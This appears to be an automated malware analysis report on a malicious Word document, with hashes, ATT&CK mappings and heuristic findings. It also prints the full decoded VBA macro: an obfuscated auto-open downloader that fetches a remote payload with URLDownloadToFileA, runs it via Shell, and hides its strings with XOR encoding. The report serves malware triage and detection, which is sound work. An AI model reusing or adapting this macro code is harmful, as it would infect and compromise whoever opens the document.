Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 10841585f9856262…

MALICIOUS

Office (OLE)

94.5 KB Created: 2015-01-20 10:08:00 Authoring application: Microsoft Office Word First seen: 2015-03-15
MD5: f3c3fbeed637cccc7549636b7e0f7cdb SHA-1: 51fbe45ef0c612b2f864e97faeaad89701985fcc SHA-256: 10841585f9856262b8fa5fdeab9ff5ae3adab09a73af00c3fbc772bb96028275
278 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros that trigger on 'autoopen', indicating an attempt to execute malicious code upon opening. Critical heuristics indicate the use of the URLDownloadToFile API, suggesting the macro's purpose is to download and execute a second-stage payload from a remote source. The obfuscated nature of the VBA code and the presence of multiple classes and functions point towards a downloader or droppper malware.

Heuristics 9

  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    OwZLs2 = Shell(x9, 1)
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
        "URLDownloadToFileA" (ByVal pCaller As LongPtr, _
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    tiO XorByDataLen("—‹‹ЏЕРР—љ–”љ—ћ““С›љР•ЊРќ–‘Сљ‡љ"), Environ(XorByDataLen("«ІЇ")) & XorByDataLen("Јё·•”›™�Сљ‡љ")
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13000 bytes
SHA-256: 58ce549a7d84ae81c6b6bf1ffd414d64816ee501ee26dcde8e9903e231a370b8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
150 of 228 identifiers look randomly generated (e.g. 'BPaIIvvQfsTorIUJGASPmVhnju') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
N1
End Sub

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Function UmYcCcn()

End Function
Private Sub TpNGCNftO()

End Sub
Public Sub fHJqKPY()

End Sub
Public Sub CBGdkrVjiyB()

End Sub
Public Sub kdMvxRuzMJsFffG()

End Sub
Public Function QCbsSsDxPzV()

End Function
Public Sub SevJRSdAvZaGNgo()

End Sub
Public Function FDIuAHZzyOE()

End Function
Private Function EjhOD()

End Function
Public Sub SdLLyyajvQr()

End Sub
Private Function YMJDVSqakqmyO()

End Function
Private Function wTBeubh()

End Function
Private Function dZZYdNGNsS()

End Function
Public Function bSrUzjfTofUjtcc()

End Function
Private Function zLaHZ()

End Function

Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub DMQRvKdxQKA()

End Sub
Public Sub oteQeIVU()

End Sub
Private Sub jHQPzikE()

End Sub
Private Function JfsgRtPOqY()

End Function
Private Sub FfrlDA()

End Sub
Public Function JFQixSFPniLNtN()

End Function
Private Sub wFGEJhnuZmlBEH()

End Sub
Public Sub gQyAUxCP()

End Sub
Private Sub iiJRfGbFevVw()

End Sub

Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public Function lLQQjgCYxplw()

End Function
Public Sub mvSNrtatzH()

End Sub
Private Function mkpMSaE()

End Function
Private Sub lnfETL()

End Sub
Private Function Adivsb()

End Function
Public Function pyKmGlJcBcnhz()

End Function
Public Sub zFBNetAC()

End Sub
Public Sub HJqwP()

End Sub
Public Function oonsdjrHi()

End Function
Private Sub qiGkOMu()

End Sub
Private Function kyIrrefFO()

End Function
Public Function BasEspjByVFPVRe()

End Function
Public Function SczhKaGMgodJEE()

End Function
Public Sub mtYykADGy()

End Sub

Attribute VB_Name = "Class4"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub eJEFDIuAZzyOEHyYAgeL()

End Sub
Private Sub BPaIIvvQfsTorIUJGASPmVhnju()

End Sub
Private Function ktQxbrexFuaVVTZKDKpPB()

End Function
Private Sub PoRwgcQlbRgqZZL()

End Sub
Private Function IQEVHLlaQ()

End Function
Private Sub DZxDzL()

End Sub
Private Sub AJTNrHauNH()

End Sub
Private Function mlqbTbF()

End Function
Public Function logETM()

End Function

Attribute VB_Name = "Class5"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Function cBcnhziFpzFB()

End Function
Public Function ACLjeHJqw()

End Function
Public Function soonsdjrHihxn()

End Function
Private Sub kOMujDtkyIrr()

End Sub
Public Function ObDQBasEspj()

End Function
Public Sub FPVReuvQSczhKaG()

End Sub
Private Sub dJEEDItm()

End Sub
Public Sub kADGyQAfOK()

End Sub
Public Function BOZHHvhIfrFn()

End Function
Public Sub UIFzRPmHg()

End Sub

Attribute VB_Name = "Class6"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub QQjgD()

End Sub
Public Function zLOdyAJTNrH()

End Function
Public Function HxdmmlqbTbFSR()

End Function
Public Sub gETMwehB()

End Sub
Public Function GcpcOqMKn()

End Function
Public Sub cCcnhzwTpNGCNft()

End Sub
Public Sub kfHJqKPYNtCCB()

End Sub
Public Function rVjiyBEUkdMvxRuz()

End Function
Private Function FffGOcDQ()

End Function
Private Sub SsDxPzVFQ()

End Sub

Attribute VB_Name = "Module1"
Public Function rUkQQqyoTOPN()

End Function
Public Sub EiJuKOQIi()

End Sub
Public Sub VJeUL()

End Sub
Public Sub RFsSpBQxOBFfSQ()

End Sub
Private Function wSrxt()

End Function
Private Function stDMHlAToGBqQfg()

End Function
Private Function NUyLKbfiZyNFqY()

End Function
Private Sub cqAUjVIjFEhNgRV()

End Sub
Private Sub btqMjH()

End Sub
Private Sub YnIwFdYBDkEJ()

End Sub

Attribute VB_Name = "Module2"
Private Function BQxOBFfS()

End Function
Private Function awSrx()

End Function
Public Function QstDMHlAToGB()

End Function
Public Sub gejTNU()

End Sub
Public Function bfiZyNFqYavYqAUjV()

End Function
Private Function EhNgRVvVhbt()

End Function
Public Function HzvHYnI()

End Function
Public Function YBDkE()

End Function
Public Function nvwuzQelPccr()

End Function
Public Function OeQGorLo()

End Function
Private Function mzZZAIUxQwT()

End Function
Public Function xrJtPzK()

End Function
Public Sub pDLMVuoRTAGaiYD()

End Sub
Private Sub CnuBRssHyA()

End Sub
Private Function ZQEtNEvIT()

End Function
Private Function pQZlNhMk()

End Function

Attribute VB_Name = "Module3"
Private Sub OcDQCbsSsDx()

End Sub
Private Sub FQQSevJRSdAvZaG()

End Sub
Private Function eJEFDIuA()

End Function
Private Sub yOEHyYAgeL()

End Sub
Private Function BPaIIvvQfsTo()

End Function
Private Sub UJGASPmVhnju()

End Sub
Public Function ktQxbr()

End Function
Private Sub FuaVVTZKD()

End Sub
Public Sub BQUYPoRwgcQlb()

End Sub

Attribute VB_Name = "Module4"
Private Function frFnEquUIFzR()

End Function
Public Function gmiuxLijsCxb()

End Function
Public Function wqgLU()

End Function
Public Function JCJoBAQTQOoCvgN()

End Function
Private Sub RfpKYLxZvuVDU()

End Sub
Public Sub LQQjgCY()

End Sub
Private Function wNdymvS()

End Function
Public Sub atzHwclmk()

End Sub
Private Sub aERQhlnfETLweg()

End Sub

Attribute VB_Name = "Module5"


Attribute VB_Name = "Module6"
Public Function bfiZyNFqYavY()

End Function
Public Function UjVIjFEhNg()

End Function
Public Sub VhbtqMjHz()

End Sub
Public Function nIwFdYBDkEJRHnv()

End Function
Public Sub QelPccrvyp()

End Sub
Public Sub GorLosGCmzZZAIU()

End Sub
Private Function TmLmxrJtP()

End Function
Private Sub LYpDLMVuoRTAGa()

End Sub
Private Sub yzxCnuBRssH()

End Sub
Public Sub RuZQEtNEv()

End Sub
Public Sub BppQZlNhMkC()

End Sub
Private Function uMJgPbgdoF()

End Function
Private Function mKrUk()

End Function
Private Sub yoTOPNSD()

End Sub
Private Sub JuKOQI()

End Sub

Attribute VB_Name = "Module7"
Public Sub OeQGorLoGCmzZZAIU()

End Sub
Public Sub TmLmxrJtPKPLYpDLMVu()

End Sub
Private Sub AGaiYDyzxCnuBR()

End Sub
Public Sub yAsRuZQEtNEv()

End Sub
Public Function BppQZlNhMkCCAuMJgPbgdoFG()

End Function
Private Sub KrUkQQq()

End Sub
Private Sub OPNSDwEiJuKOQI()

End Sub
Public Function aVJeULak()

End Function
Private Function sSpBQxOBFfS()

End Function
Private Function awSrxEHQstDMHl()

End Function
Public Function GBqQfgej()

End Function
Private Sub yLKbfiZyNFqYav()

End Sub

Attribute VB_Name = "Module8"
Public Sub hxnqiG()

End Sub
Private Function ujDtkyIrrefFO()

End Function
Public Sub BasEspjByVFPVRevQSczhKaG()

End Sub
Private Function dJEEDItmYykADGyQA()

End Function
Private Function zTKBOZHHvhIf()

End Function
Public Function EquUIFz()

End Function
Private Sub HgmiuxL()

End Sub
Private Function CxbqIdwqg()

End Function
Public Function TZJCJoBAQTQOoCv()

End Function
Public Function kMRfpKYLxZvuV()

End Function
Public Sub KlLQQjgCYxpl()

End Sub
Private Function ymvSN()

End Function
Public Sub KPYNtCCB()

End Sub
Private Function rVjiyBE()

End Function

Attribute VB_Name = "Module9"
Public Sub UVTZJCJoBAQTQ()

End Sub
Private Sub vgNPkMRfpKY()

End Sub
Public Sub vuVDUGKlLQQjgCY()

End Sub
Private Sub wNdymvSrtatzHwclmkpM()

End Sub
Private Sub RQhlnfETLwe()

End Sub
Public Sub ivsbo()

End Sub
Public Sub yKmGlJcB()

End Sub
Private Function ziFpzF()

End Function
Private Function tACLje()

End Function

Attribute VB_Name = "Module10"

Attribute VB_Name = "Module11"
#If VBA7 Then
    Private Declare PtrSafe Function GHGijkHKJG Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal pCaller As LongPtr, _
    ByVal sdfsdf As String, _
    ByVal jdfgdfg As String, _
    ByVal tjrtgefsdf As Long, _
    ByVal khlkdfsef As LongPtr) As LongPtr
#Else
    Private Declare Function GHGijkHKJG Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal pCaller As Long, _
    ByVal sdfsdf As String, _
    ByVal jdfgdfg As String, _
    ByVal tjrtgefsdf As Long, _
    ByVal khlkdfsef As Long) As Long
#End If


Sub N1()
tiO XorByDataLen("—‹‹ЏЕРР—љ–”љ—ћ““С›љР•ЊРќ–‘Сљ‡љ"), Environ(XorByDataLen("«ІЇ")) & XorByDataLen("Јё·•”›™�Сљ‡љ")
Dim ZjplxNd As Integer
For ZjplxNd = 0 To 0
If ZjplxNd = 5 Then End
Next ZjplxNd
Dim bpQoaeEsqkC As Integer
For bpQoaeEsqkC = 0 To 0
If bpQoaeEsqkC = 5 Then End
Next bpQoaeEsqkC
End Sub
Function tiO(f243r14Z As String, x9 As String) As Boolean
vJHKBJdfkgfg = GHGijkHKJG(0&, f243r14Z, x9, 0&, 0&)
Dim erSnRqHiITNg As Integer
For erSnRqHiITNg = 0 To 0
If erSnRqHiITNg = 5 Then End
Next erSnRqHiITNg
Dim oocNpLYmT As Integer
For oocNpLYmT = 0 To 0
If oocNpLYmT = 5 Then End
Next oocNpLYmT
Dim OwZLs2
Dim KMhJO As Integer
For KMhJO = 0 To 0
If KMhJO = 5 Then End
Next KMhJO
Dim LYmTlQb As Integer
For LYmTlQb = 0 To 0
If LYmTlQb = 5 Then End
Next LYmTlQb
OwZLs2 = Shell(x9, 1)
Dim OcZHUuuVer As Integer
For OcZHUuuVer = 0 To 0
If OcZHUuuVer = 5 Then End
Next OcZHUuuVer
Dim ocNpLYm As Integer
For ocNpLYm = 0 To 0
If ocNpLYm = 5 Then End
Next ocNpLYm
End Function

Public Function XorByDataLen(sData As String) As String
Dim bData() As Byte
Dim ZvfqvsD As Integer
For ZvfqvsD = 0 To 0
If ZvfqvsD = 5 Then End
Next ZvfqvsD
Dim pKArFPyyl As Integer
For pKArFPyyl = 0 To 0
If pKArFPyyl = 5 Then End
Next pKArFPyyl
Dim i As Integer
Dim QvHHQbeVuJ As Integer
For QvHHQbeVuJ = 0 To 0
If QvHHQbeVuJ = 5 Then End
Next QvHHQbeVuJ
Dim Npaquw As Integer
For Npaquw = 0 To 0
If Npaquw = 5 Then End
Next Npaquw
If Len(sData) <> 0 Then
Dim xnSccaf As Integer
For xnSccaf = 0 To 0
If xnSccaf = 5 Then End
Next xnSccaf
Dim RCxmGxo As Integer
For RCxmGxo = 0 To 0
If RCxmGxo = 5 Then End
Next RCxmGxo
ReDim bData(Len(sData))
Dim NrEDTYbRrG As Integer
For NrEDTYbRrG = 0 To 0
If NrEDTYbRrG = 5 Then End
Next NrEDTYbRrG
Dim bQwrsqvgZgKl As Integer
For bQwrsqvgZgKl = 0 To 0
If bQwrsqvgZgKl = 5 Then End
Next bQwrsqvgZgKl
bData = StrConv(sData, vbFromUnicode)
Dim yYyJDVSp As Integer
For yYyJDVSp = 0 To 0
If yYyJDVSp = 5 Then End
Next yYyJDVSp
Dim dUuQB As Integer
For dUuQB = 0 To 0
If dUuQB = 5 Then End
Next dUuQB
For i = 0 To Len(sData) - 1
Dim NdwPje As Integer
For NdwPje = 0 To 0
If NdwPje = 5 Then End
Next NdwPje
Dim qyzJh As Integer
For qyzJh = 0 To 0
If qyzJh = 5 Then End
Next qyzJh
bData(i) = bData(i) Xor 255
Dim xPMkFekgs As Integer
For xPMkFekgs = 0 To 0
If xPMkFekgs = 5 Then End
Next xPMkFekgs
Dim CmxDzK As Integer
For CmxDzK = 0 To 0
If CmxDzK = 5 Then End
Next CmxDzK
Next i
Dim sfGcpDlCo As Integer
For sfGcpDlCo = 0 To 0
If sfGcpDlCo = 5 Then End
Next sfGcpDlCo
Dim dzjuzwHZ As Integer
For dzjuzwHZ = 0 To 0
If dzjuzwHZ = 5 Then End
Next dzjuzwHZ
XorByDataLen = StrConv(bData, vbUnicode)
Dim pcCZmAhzl As Integer
For pcCZmAhzl = 0 To 0
If pcCZmAhzl = 5 Then End
Next pcCZmAhzl
Dim yNGqY As Integer
For yNGqY = 0 To 0
If yNGqY = 5 Then End
Next yNGqY
End If
Dim TCCpcCZmAh As Integer
For TCCpcCZmAh = 0 To 0
If TCCpcCZmAh = 5 Then End
Next TCCpcCZmAh
Dim vYcqn As Integer
For vYcqn = 0 To 0
If vYcqn = 5 Then End
Next vYcqn
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.